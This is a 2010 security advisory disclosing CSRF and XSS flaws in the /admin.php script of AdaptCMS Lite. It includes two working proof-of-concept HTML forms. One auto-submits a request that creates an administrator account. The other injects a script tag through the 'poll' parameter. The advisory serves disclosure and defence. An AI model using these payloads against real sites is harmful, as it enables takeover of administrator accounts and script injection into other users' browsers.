Multiple vulnerabilities in AdaptCMS Lite

2010-04-07T00:00:00
ID HTB22346
Type htbridge
Reporter High-Tech Bridge
Modified 2010-04-07T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in AdaptCMS Lite which could be exploited to perform cross-site request forgery and cross-site scripting attacks.

1) Cross-site request forgery (CSRF) in AdaptCMS Lite
The vulnerability exists due to insufficient validation of the request origin in the /admin.php script. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and gain complete control over the application.
Exploitation example:
<form action="http://host/admin.php?view=edit_users2&id=MY_ID" method="post">
<input type=hidden name=username1 value=test >
<input type=hidden name=password1 value=test >
<input type=hidden name=email1 value=test@example.com >
<input type=hidden name=level value=Admin >
</form>
<script>
document.forms[0].submit()
</script>

2) Cross-site scripting vulnerability (XSS) in AdaptCMS Lite
The vulnerability exists due to input validation error in the HTTP POST "poll" parameter in /admin.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and scripting code in user`s browser in context of the vulnerable website.
Exploitation example:
<form action='http://host/admin.php?view=edit_poll2' method='post' >
<input type='text' name='poll' size='25' value='new text?"><script>alert()</script>'>
<input type='checkbox' name='multiple' value='yes'>
<input type='checkbox' name='custom' value='yes'>
<input type='hidden' name='id' value='1'><input type='hidden' name='oldpoll' value='old text'>
<input type='submit' value='Update Poll' >
</form>
<script>
document.forms[0].submit()
</script>